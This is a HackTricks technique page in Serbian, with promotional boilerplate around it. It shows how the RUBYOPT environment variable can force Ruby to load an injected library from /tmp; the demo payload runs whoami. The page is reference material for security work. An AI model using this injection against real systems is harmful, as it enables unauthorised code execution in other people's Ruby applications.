macOS Ruby Applications Injection

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite vašu kompaniju reklamiranu u HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

RUBYOPT

Korišćenjem ove okružne promenljive moguće je dodati nove parametre u ruby kada god se izvršava. Iako parametar -e ne može se koristiti za specificiranje ruby koda za izvršavanje, moguće je koristiti parametre -I i -r da se doda nova fascikla u putanju za učitavanje biblioteka, a zatim specificirati biblioteku za učitavanje.

Kreirajte biblioteku inject.rb u /tmp:

inject.rb

puts `whoami`

Napravite bilo gde Ruby skriptu kao:

hello.rb

puts 'Hello, World!'

Zatim napravite proizvoljni Ruby skript i učitajte ga sa:

RUBYOPT="-I/tmp -rinject" ruby hello.rb

Zanimljiva činjenica, radi čak i sa parametrom --disable-rubyopt:

RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite PLANOVE ZA PRETPLATU!
Nabavite zvanični PEASS & HackTricks swag
Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousmacOS Python Applications Injection NextmacOS .Net Applications Injection

Last updated 2 months ago